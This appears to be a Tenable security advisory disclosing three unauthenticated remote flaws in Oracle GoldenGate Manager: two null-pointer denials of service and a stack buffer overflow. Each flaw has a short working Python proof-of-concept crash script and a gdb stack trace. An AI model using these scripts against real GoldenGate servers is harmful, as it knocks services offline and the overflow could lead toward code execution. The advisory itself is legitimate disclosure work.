Synopsis
While researching Oracle GoldenGate, Tenable found three vulnerabilities in GoldenGate Manager. GoldenGate Manager is the process that is in charge of monitoring, controlling, and reporting status on other GoldenGate components. The Manager listens on port 7809 where it accepts GoldenGate Software Command Interface (GGSCI) commands.
CVE-2018-2912: Unauthenticated Remote Denial of Service
A null pointer dereference can occur if an unauthenticated remote attacker provides a malformed command in the connection initiation. Specifically, an attacker can trigger the condition by sending a START and VERSION but omitting the separating tab character. The following is a proof of concept:
import sys import struct import socket if len(sys.argv) != 3: print 'Usage: ./tab_deref.py <host> <port>' sys.exit(0) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = (sys.argv[1], int(sys.argv[2])) print '[+] connecting to %s port %s' % server_address sock.connect(server_address) print '[+] sending crash text' cmd = 'START VERSION' length = struct.pack(">H", len(cmd)) sock.sendall(length + cmd) print '[+] Fin.' sock.close()
The proof of concept generates the following stack trace:
(gdb) bt #0 0x00000000005d61f3 in check_messages (timeout=<optimized out>, dynamic_ports=...) at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2710 #1 0x00000000005d7eb1 in main_loop ([email protected]=3, [email protected]=0x7fffffffde48) at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2361 #2 0x00000000005d82a3 in mgr_main (argc=3, argv=0x7fffffffde48) at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2493 #3 0x00000000005325e6 in ggs::gglib::MultiThreading::MainThread::ExecMain (this=0x7fffffffdc50) at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:1302 #4 0x00000000005369b7 in ggs::gglib::MultiThreading::Thread::RunThread ([email protected]=0xe3ea90) at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:496 #5 0x0000000000536fcd in ggs::gglib::MultiThreading::MainThread::Run (this=<optimized out>, argc=<optimized out>, argv=<optimized out>) at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:1293 #6 0x00000000005d892b in main ()
CVE-2018-2913: Unauthenticated Remote Stack Buffer Overflow
A stack buffer overflow can occur if an unauthenticated remote attacker provides a malformed command. An attacker can trigger the condition by simply sending a long command. The following is a proof of concept:
import sys import struct import socket if len(sys.argv) != 3: print 'Usage: ./buffer_overrun.py <host> <port>' sys.exit(0) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = (sys.argv[1], int(sys.argv[2])) print '[+] connecting to %s port %s' % server_address sock.connect(server_address) print '[+] sending crash text' cmd = 'Nessus\taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' length = struct.pack(">H", len(cmd)) sock.sendall(length + cmd) print '[+] Fin.' sock.close()
The proof of concept generates the following stack trace:
(gdb) bt #0 0x00007fffefbfa428 in __GI_raise ([email protected]=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1 0x00007fffefbfc02a in __GI_abort () at abort.c:89 #2 0x00007fffefc3c7ea in __libc_message ([email protected]=1, [email protected]=0x7fffefd538a2 "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:175 #3 0x00007fffefcdd56c in __GI___fortify_fail (msg=<optimized out>, [email protected]=0x7fffefd53884 "stack smashing detected") at fortify_fail.c:37 #4 0x00007fffefcdd510 in __stack_chk_fail () at stack_chk_fail.c:28 #5 0x00000000005daf09 in MGRSEC_check_client_access (instr=<optimized out>, client_ip_addr=0xbe3868 <ggs::ggAdmin::AdminCtx::getInstance()::instance+904> "192.168.1.152", reply=0x7ffffffee3b0 "Access denied") at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgrsec.c:448 #6 0x6161616161616161 in ?? () #7 0x6161616161616161 in ?? () #8 0x6161616161616161 in ?? () #9 0x6161616161616161 in ?? () #10 0x6161616161616161 in ?? () #11 0x6161616161616161 in ?? () #12 0x6161616161616161 in ?? () #13 0x6161616161616161 in ?? () #14 0x6161616161616161 in ?? () #15 0x6161616161616161 in ?? () #16 0x6161616161616161 in ?? () #17 0x6161616161616161 in ?? () #18 0x6161616161616161 in ?? () #19 0x6161616161616161 in ?? () #20 0x6161616161616161 in ?? () #21 0x6161616161616161 in ?? () #22 0x6161616161616161 in ?? () #23 0x6161616161616161 in ?? () #24 0x6161616161616161 in ?? () #25 0x6161616161616161 in ?? () #26 0x6161616161616161 in ?? () #27 0x6161616161616161 in ?? () #28 0x6161616161616161 in ?? () #29 0x6161616161616161 in ?? () #30 0x0000030061616161 in ?? () #31 0x00000000000003e8 in ?? () #32 0x0000000000000000 in ?? ()
CVE-2018-2914: Unauthenticated Remote Denial of Service
Another null pointer dereference can occur if an unauthenticated remote attacker provides a malformed command. The condition is triggered when an attacker sends an incomplete REPORT command to the server. The following is a proof of concept:
import sys import struct import socket if len(sys.argv) != 3: print 'Usage: ./report_dereference.py <host> <port>' sys.exit(0) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = (sys.argv[1], int(sys.argv[2])) print '[+] connecting to %s port %s' % server_address sock.connect(server_address) print '[+] sending crash text' cmd = 'Nessus\tREPORT' length = struct.pack(">H", len(cmd)) sock.sendall(length + cmd) print '[+] Fin.' sock.close()
The proof of concept generates the following stack trace:
(gdb) bt #0 __GI_____strtol_l_internal (nptr=0x0, endptr=0x0, base=10, group=<optimized out>, loc=0x7fffeff89420 <_nl_global_locale>) at ../stdlib/strtol_l.c:293 #1 0x00000000005d6d7c in strtol (__base=10, __endptr=0x0, __nptr=<optimized out>) at /usr/include/stdlib.h:336 #2 atoi (__nptr=<optimized out>) at /usr/include/stdlib.h:404 #3 check_messages (timeout=<optimized out>, dynamic_ports=...) at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2817 #4 0x00000000005d7eb1 in main_loop ([email protected]=3, [email protected]=0x7fffffffde48) at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2361 #5 0x00000000005d82a3 in mgr_main (argc=3, argv=0x7fffffffde48) at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2493 #6 0x00000000005325e6 in ggs::gglib::MultiThreading::MainThread::ExecMain (this=0x7fffffffdc50) at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:1302 #7 0x00000000005369b7 in ggs::gglib::MultiThreading::Thread::RunThread ([email protected]=0xe3ea90) at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:496 #8 0x0000000000536fcd in ggs::gglib::MultiThreading::MainThread::Run (this=<optimized out>, argc=<optimized out>, argv=<optimized out>) at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:1293 #9 0x00000000005d892b in main ()
Solution
Additional References
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]